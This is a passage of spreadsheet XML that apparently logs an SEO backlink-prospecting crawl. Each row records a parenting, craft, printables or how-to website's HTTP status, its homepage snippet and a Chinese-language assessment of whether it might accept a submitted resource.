        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q310" s="21" t="str">
        <x:v>Judy Nolan Skip to content Home About Tutorials Shops JNOriginals Crochet MisterPenQuin Books Facebook Instagram LinkedIn Pinterest Search for: Home About Tutorials Shops JNOriginals Crochet MisterPenQuin Books Facebook Instagram LinkedIn Pinterest This Creative Journey where writing meets creativity, curiosity &amp; the handmade life Six Lessons That Bookmaking Teaches You Creativity , Handmade / 1 Comment / 8 minutes of reading On Day 3, I used a utility knife to cut chipboard for the book covers, front and back. In a perfect world, a bookmaker [&amp;hellip;] Six Lessons That Bookmaking Teaches You Read More » Words Matter Reflections , Writing / Leave a Comment / 6 minutes of reading How will fut</x:v>
      </x:c>
      <x:c r="R310" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S310" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T310" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://judy-nolan.com</x:v>
      </x:c>
    </x:row>
    <x:row r="311">
      <x:c r="A311" s="18" t="str">
        <x:v>310</x:v>
      </x:c>
      <x:c r="B311" s="19" t="str">
        <x:v>hisawyer.com</x:v>
      </x:c>
      <x:c r="C311" s="19" t="str">
        <x:v>https://hisawyer.com</x:v>
      </x:c>
      <x:c r="D311" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E311" s="20" t="str">
        <x:v>4</x:v>
      </x:c>
      <x:c r="F311" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G311" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H311" s="19" t="str">
        <x:v>https://hisawyer.com/</x:v>
      </x:c>
      <x:c r="I311" s="19" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="J311" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K311" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L311" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M311" s="19" t="str">
        <x:v>https://hisawyer.com/</x:v>
      </x:c>
      <x:c r="N311" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O311" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P311" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q311" s="21" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="R311" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S311" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T311" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://hisawyer.com</x:v>
      </x:c>
    </x:row>
    <x:row r="312">
      <x:c r="A312" s="18" t="str">
        <x:v>311</x:v>
      </x:c>
      <x:c r="B312" s="19" t="str">
        <x:v>thedenverhousewife.com</x:v>
      </x:c>
      <x:c r="C312" s="19" t="str">
        <x:v>https://thedenverhousewife.com</x:v>
      </x:c>
      <x:c r="D312" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E312" s="20" t="str">
        <x:v>4</x:v>
      </x:c>
      <x:c r="F312" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G312" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H312" s="19" t="str">
        <x:v>https://www.thedenverhousewife.com/</x:v>
      </x:c>
      <x:c r="I312" s="19" t="str">
        <x:v>&amp;raquo; The Denver Housewife</x:v>
      </x:c>
      <x:c r="J312" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K312" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L312" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M312" s="19" t="str">
        <x:v>https://www.thedenverhousewife.com/</x:v>
      </x:c>
      <x:c r="N312" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O312" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P312" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q312" s="21" t="str">
        <x:v>See more HALLOWEEN &amp;raquo; The Denver Housewife Skip to Content Search Search for: Close Search &amp;times; Blog Denver Life DIY Cleaning Crafts Cricut Sublimation SVG Files Family Life Printables Recipes Breakfast Desserts Dinner Hot Cocoa Bombs Sides Snacks About Me Facebook Twitter Pinterest Instagram TikTok Mail HALLOWEEN Free Printable Halloween Zombie Scrunchie Holders Leftover Thanksgiving Turkey Sliders Homemade Apple Cider Powder Mix Halloween Rolo Pretzels Monster Eyes Halloween Muddy Buddies Graveyard Snack Mix Halloween Candy Rice Krispie Treats Turkey Toes Free Printable Fall Bucket List Printable See more HALLOWEEN Get the Latest! Sign up with your email address to the newest posts delivered right to</x:v>
      </x:c>
      <x:c r="R312" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S312" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T312" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://thedenverhousewife.com</x:v>
      </x:c>
    </x:row>
    <x:row r="313">
      <x:c r="A313" s="18" t="str">
        <x:v>312</x:v>
      </x:c>
      <x:c r="B313" s="19" t="str">
        <x:v>preschoolprintablesfree.com</x:v>
      </x:c>
      <x:c r="C313" s="19" t="str">
        <x:v>https://preschoolprintablesfree.com</x:v>
      </x:c>
      <x:c r="D313" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E313" s="20" t="str">
        <x:v>4</x:v>
      </x:c>
      <x:c r="F313" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G313" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H313" s="19" t="str">
        <x:v>https://preschoolprintablesfree.com/</x:v>
      </x:c>
      <x:c r="I313" s="19" t="str">
        <x:v>Free Preschool Printables – Free Printable Preschool Resources</x:v>
      </x:c>
      <x:c r="J313" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K313" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L313" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M313" s="19" t="str">
        <x:v>https://preschoolprintablesfree.com/</x:v>
      </x:c>
      <x:c r="N313" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O313" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P313" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q313" s="21" t="str">
        <x:v>Free Preschool Printables – Free Printable Preschool Resources Skip to content Menu Alphabet Counting Games Matching Activities Holidays and Themes Songs and Rhymes Fine Motor Skills Menu Alphabet Counting Games Matching Activities Holidays and Themes Songs and Rhymes Fine Motor Skills Welcome! My goal is to save you time by offering free resources that supplement your curriculum. Click on a category or scroll down for more themes to get started. Latest Posts Free Camping Coloring Pages for Preschoolers Bee Craft with Facts for Kids to Make Free Printable Number Hats for Kids Free Count and Build Worksheets for Preschoolers Free Printable Classroom Coloring Pages for Kids Holidays Valentine’</x:v>
      </x:c>
      <x:c r="R313" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S313" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T313" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://preschoolprintablesfree.com</x:v>
      </x:c>
    </x:row>
    <x:row r="314">
      <x:c r="A314" s="18" t="str">
        <x:v>313</x:v>
      </x:c>
      <x:c r="B314" s="19" t="str">
        <x:v>4theloveoffoodblog.com</x:v>
      </x:c>
      <x:c r="C314" s="19" t="str">
        <x:v>https://4theloveoffoodblog.com</x:v>
      </x:c>
      <x:c r="D314" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E314" s="20" t="str">
        <x:v>4</x:v>
      </x:c>
      <x:c r="F314" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G314" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H314" s="19" t="str">
        <x:v>https://www.4theloveoffoodblog.com/</x:v>
      </x:c>
      <x:c r="I314" s="19" t="str">
        <x:v>For the Love of Food - Sharing home cooked, family friendly recipes, reviews, projects, &amp; parties from my family to yours!</x:v>
      </x:c>
      <x:c r="J314" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K314" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L314" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M314" s="19" t="str">
        <x:v>https://www.4theloveoffoodblog.com/</x:v>
      </x:c>
      <x:c r="N314" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O314" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P314" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q314" s="21" t="str">
        <x:v>Sharing home cooked, family friendly recipes, reviews, projects, &amp; parties from my family to yours! For the Love of Food - Sharing home cooked, family friendly recipes, reviews, projects, &amp; parties from my family to yours! Skip to primary navigation Skip to main content Skip to primary sidebar Skip to footer Home About Bio Work With Me Disclosure Press and Recognition Recipes Recipe Index Roundups Top 10 Holiday Travel Tips Things To Do Hotels Restaurants Fun Gift Ideas Pets Military Parties Disney Crafts Printables Parenting Ava and Stella Breastfeeding Pregnancy Cooking Videos Subscribe Navigation Menu: Social Icons Search Christmas Cookie Exchange Free Printables – Ballots, Awards, and Signs December 15, 2025 By Nicole Hood 2 Comments Hosting a Christmas Cookie Exchange is something I l</x:v>
      </x:c>
      <x:c r="R314" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S314" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T314" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://4theloveoffoodblog.com</x:v>
      </x:c>
    </x:row>
    <x:row r="315">
      <x:c r="A315" s="18" t="str">
        <x:v>314</x:v>
      </x:c>
      <x:c r="B315" s="19" t="str">
        <x:v>theabcsofmotherhood.com</x:v>
      </x:c>
      <x:c r="C315" s="19" t="str">
        <x:v>https://theabcsofmotherhood.com</x:v>
      </x:c>
      <x:c r="D315" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E315" s="20" t="str">
        <x:v>4</x:v>
      </x:c>
      <x:c r="F315" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G315" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H315" s="19" t="str">
        <x:v>https://raisedonreadalouds.com/</x:v>
      </x:c>
      <x:c r="I315" s="19" t="str">
        <x:v>Home - Raised On Read-Alouds</x:v>
      </x:c>
      <x:c r="J315" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K315" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L315" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M315" s="19" t="str">
        <x:v>https://raisedonreadalouds.com/</x:v>
      </x:c>
      <x:c r="N315" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O315" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P315" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q315" s="21" t="str">
        <x:v>Home - Raised On Read-Alouds Top Raised On Read-Alouds creating book lovers, one story at a time About About The ABCs of Motherhood Privacy Policy &amp; Disclosure Motherhood + Home Pregnancy + Postpartum Meal Ideas Activities Books Holidays + Seasonal Holidays + seasonal Grab Your FREE December Christmas Read-Aloud Calendar Grab Your FREE July Nature Calendar and Booklist Grab Your FREE June Nature Calendar and Booklist Grab Your FREE May Nature Calendar and Booklist Grab Your FREE April Nature Calendar and Booklist Grab Your FREE March Nature Calendar and Booklist More Posts Activities Grab Your FREE December Christmas Read-Aloud Calendar Grab Your FREE July Nature Calendar and Booklist Grab Y</x:v>
      </x:c>
      <x:c r="R315" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S315" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T315" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://theabcsofmotherhood.com</x:v>
      </x:c>
    </x:row>
    <x:row r="316">
      <x:c r="A316" s="18" t="str">
        <x:v>315</x:v>
      </x:c>
      <x:c r="B316" s="19" t="str">
        <x:v>thefrugalfreegal.com</x:v>
      </x:c>
      <x:c r="C316" s="19" t="str">
        <x:v>https://thefrugalfreegal.com</x:v>
      </x:c>
      <x:c r="D316" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E316" s="20" t="str">
        <x:v>4</x:v>
      </x:c>
      <x:c r="F316" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G316" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H316" s="19" t="str">
        <x:v>https://thefrugalfreegal.com/</x:v>
      </x:c>
      <x:c r="I316" s="19" t="str">
        <x:v>The Frugal Free Gal - Frugal Living, Money Saving Tips, Freebies, and More!</x:v>
      </x:c>
      <x:c r="J316" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K316" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L316" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M316" s="19" t="str">
        <x:v>https://thefrugalfreegal.com/</x:v>
      </x:c>
      <x:c r="N316" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O316" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P316" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q316" s="21" t="str">
        <x:v>Frugal Living, Money Saving Tips, Freebies, and More! The Frugal Free Gal - Frugal Living, Money Saving Tips, Freebies, and More! Home About Me Terms of Use Free Kindle Books List of Current Giveaways Money Saving Tips Mailbox Freebies FREE Printables Freebies Search Search Best Books to Look for at Thrift Stores: What to Buy and What to Skip Thrift stores can be one of the best places to shop for books when you want to build your reading collection without spending a lot of money. From children’s books and cookbooks to classic novels, hobby guides, and beautiful hardcover books, there are plenty of titles worth checking before you head to the bookstore and&amp;hellip; List of Current Giveaways Giveaway Disclaimer: Giveaway and sweepstakes informat</x:v>
      </x:c>
      <x:c r="R316" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S316" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T316" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://thefrugalfreegal.com</x:v>
      </x:c>
    </x:row>
    <x:row r="317">
      <x:c r="A317" s="18" t="str">
        <x:v>316</x:v>
      </x:c>
      <x:c r="B317" s="19" t="str">
        <x:v>guinealynx.com</x:v>
      </x:c>
      <x:c r="C317" s="19" t="str">
        <x:v>https://guinealynx.com</x:v>
      </x:c>
      <x:c r="D317" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E317" s="20" t="str">
        <x:v>4</x:v>
      </x:c>
      <x:c r="F317" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G317" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H317" s="19" t="str">
        <x:v>https://guinealynx.info/</x:v>
      </x:c>
      <x:c r="I317" s="19" t="str">
        <x:v>Guinea Lynx ::</x:v>
      </x:c>
      <x:c r="J317" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K317" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L317" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M317" s="19" t="str">
        <x:v>https://guinealynx.info/</x:v>
      </x:c>
      <x:c r="N317" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O317" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P317" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q317" s="21" t="str">
        <x:v>A comprehensive medical and care guide for the care of guinea pigs. Guinea Lynx :: FORUMS SITEMAP INDEX CARE GUIDE Diet Housing MEDICAL GUIDE EMERGENCY Finding a Vet Hand Feeding Surgery MEDICATIONS Dangerous Medications Antibiotics MEDICAL REFERENCE Bladder Stones Eyes Fungus Hair Loss Heart Lumps Mites Teeth MORE TOPICS ... Need the Basics? Start with the CARE GUIDE - Raising a Healthy Guinea Pig . Is your guinea pig ill? Consult the EMERGENCY MEDICAL GUIDE for Signs of Illness. Looking for a pet? Do it the right way and Adopt a Rescued Guinea Pig! Many people are unaware there are homeless guinea pigs. Make a difference and adopt! In The News... New FUN Page! Fun for your guinea pigs and fun for you! Cage accessories, houses, &amp; cozies! Read more... Guinea</x:v>
      </x:c>
      <x:c r="R317" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S317" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T317" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://guinealynx.com</x:v>
      </x:c>
    </x:row>
    <x:row r="318">
      <x:c r="A318" s="18" t="str">
        <x:v>317</x:v>
      </x:c>
      <x:c r="B318" s="19" t="str">
        <x:v>momjunky.com</x:v>
      </x:c>
      <x:c r="C318" s="19" t="str">
        <x:v>https://momjunky.com</x:v>
      </x:c>
      <x:c r="D318" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E318" s="20" t="str">
        <x:v>4</x:v>
      </x:c>
      <x:c r="F318" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G318" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H318" s="19" t="str">
        <x:v>https://www.momjunky.com/</x:v>
      </x:c>
      <x:c r="I318" s="19" t="str">
        <x:v>Home - Mom Junky</x:v>
      </x:c>
      <x:c r="J318" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K318" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L318" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M318" s="19" t="str">
        <x:v>https://www.momjunky.com/</x:v>
      </x:c>
      <x:c r="N318" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O318" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P318" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q318" s="21" t="str">
        <x:v>Home - Mom Junky GO! GO! Travel Arizona California Costa Rica England Finland Greece Florida Malta Michigan Texas All Travel Fun Crafts Printables Gift Giving Holidays Party Ideas Kids Activities Toys Family Parenting Health &amp; Wellness Beauty Special Needs Recipes Appetizers Snacks Dinner Ideas Holiday Drinks Desserts &amp; Sweets Salads Cakes Keto Weight Watchers For the Home Featured Posts 37 Flavor-Packed Ball Canning Recipes to Stock Your Shelves How to Prepare for an IEP Meeting (Parent Guide + Free Checklist) Summer Camp Packing List for Kids: 25+ Essentials 150 Fun Road Trip Trivia Questions for Kids, Teens &amp; Adults (2026) Travel more posts The WorldMark Phoenix South Mountain Preserve; T</x:v>
      </x:c>
      <x:c r="R318" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S318" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T318" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://momjunky.com</x:v>
      </x:c>
    </x:row>
    <x:row r="319">
      <x:c r="A319" s="18" t="str">
        <x:v>318</x:v>
      </x:c>
      <x:c r="B319" s="19" t="str">
        <x:v>wikihow.com</x:v>
      </x:c>
      <x:c r="C319" s="19" t="str">
        <x:v>https://wikihow.com</x:v>
      </x:c>
      <x:c r="D319" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E319" s="20" t="str">
        <x:v>4</x:v>
      </x:c>
      <x:c r="F319" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G319" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H319" s="19" t="str">
        <x:v>https://www.wikihow.com/Main-Page</x:v>
      </x:c>
      <x:c r="I319" s="19" t="str">
        <x:v>wikiHow: How-to instructions you can trust.</x:v>
      </x:c>
      <x:c r="J319" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K319" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L319" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M319" s="19" t="str">
        <x:v>https://www.wikihow.com/Main-Page</x:v>
      </x:c>
      <x:c r="N319" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O319" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P319" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q319" s="21" t="str">
        <x:v>Learn how to do anything with wikiHow, the world's most popular how-to website. Easy, well-researched, and trustworthy instructions for everything you want to know. wikiHow: How-to instructions you can trust. Skip to Content Quizzes Search PRO Courses Hot Guides Tech Help Pro Expert Videos About wikiHow Pro Upgrade QUIZZES All Quizzes Hot Love Quizzes Personality Quizzes Trivia Quizzes Taylor Swift Quizzes EXPLORE Tech Help Pro About Us Random Article Quizzes Request a New Article Community Dashboard Trending Forums Arts and Entertainment Artwork Books Movies Computers and Electronics Computers Phone Skills Technology Hacks Health Men's Health Mental Health Women's Health Relationships Dating Love Relationship Issues Hobbies and Crafts Crafts Drawing Games Education &amp; Communication Communication Skills Personal Development Studying Personal Care and Sty</x:v>
      </x:c>
      <x:c r="R319" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S319" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T319" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://wikihow.com</x:v>
      </x:c>
    </x:row>
    <x:row r="320">
      <x:c r="A320" s="18" t="str">
        <x:v>319</x:v>
      </x:c>
      <x:c r="B320" s="19" t="str">
        <x:v>mamaofminis.com</x:v>
      </x:c>
      <x:c r="C320" s="19" t="str">
        <x:v>https://mamaofminis.com</x:v>
      </x:c>
      <x:c r="D320" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E320" s="20" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="F320" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G320" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H320" s="19" t="str">
        <x:v>https://mamaofminis.com/</x:v>
      </x:c>
      <x:c r="I320" s="19" t="str">
        <x:v>Home - Mama of Minis</x:v>
      </x:c>
      <x:c r="J320" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K320" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L320" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M320" s="19" t="str">
        <x:v>https://mamaofminis.com/</x:v>
      </x:c>
      <x:c r="N320" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O320" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P320" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q320" s="21" t="str">
        <x:v>Mama of Minis is a Mom lifestyle blog focusing on kid's crafts and activities, Mom life, kid's printables, recipes, and more. Home - Mama of Minis Skip to content Home Blog Contact Home About Crafts and activities Mom Life Printables Recipes Contact Crafts &amp; Activities Recipes Printables Mom Life Tips Crafts and activities / Featured 12 Fun Name Activities and Crafts for Preschoolers As the end of summer is coming up quickly, a new group of toddlers and preschoolers will be heading off to school in the Fall. What better way to get… Continue Reading 12 Fun Name Activities and Crafts for Preschoolers Mom Life 140+ Remarkable Things that are Red for Kids If you are looking for a long and detailed list of things that are red,… Read More 140+ Remarkable Things that are Red for Kids Crafts and activities The Cutest Back </x:v>
      </x:c>
      <x:c r="R320" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S320" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T320" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://mamaofminis.com</x:v>
      </x:c>
    </x:row>
    <x:row r="321">
      <x:c r="A321" s="18" t="str">
        <x:v>320</x:v>
      </x:c>
      <x:c r="B321" s="19" t="str">
        <x:v>craftywelshgrandma.co.uk</x:v>
      </x:c>
      <x:c r="C321" s="19" t="str">
        <x:v>https://craftywelshgrandma.co.uk</x:v>
      </x:c>
      <x:c r="D321" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E321" s="20" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="F321" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G321" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H321" s="19" t="str">
        <x:v>https://craftywelshgrandma.co.uk/</x:v>
      </x:c>
      <x:c r="I321" s="19" t="str"/>
      <x:c r="J321" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K321" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L321" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M321" s="19" t="str">
        <x:v>https://craftywelshgrandma.co.uk/</x:v>
      </x:c>
      <x:c r="N321" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O321" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P321" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q321" s="21" t="str"/>
      <x:c r="R321" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S321" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T321" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://craftywelshgrandma.co.uk</x:v>
      </x:c>
    </x:row>
    <x:row r="322">
      <x:c r="A322" s="18" t="str">
        <x:v>321</x:v>
      </x:c>
      <x:c r="B322" s="19" t="str">
        <x:v>archyde.com</x:v>
      </x:c>
      <x:c r="C322" s="19" t="str">
        <x:v>https://archyde.com</x:v>
      </x:c>
      <x:c r="D322" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E322" s="20" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="F322" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G322" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H322" s="19" t="str">
        <x:v>https://archyde.com/</x:v>
      </x:c>
      <x:c r="I322" s="19" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="J322" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K322" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L322" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M322" s="19" t="str">
        <x:v>https://archyde.com/</x:v>
      </x:c>
      <x:c r="N322" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O322" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P322" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q322" s="21" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="R322" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S322" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T322" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://archyde.com</x:v>
      </x:c>
    </x:row>
    <x:row r="323">
      <x:c r="A323" s="18" t="str">
        <x:v>322</x:v>
      </x:c>
      <x:c r="B323" s="19" t="str">
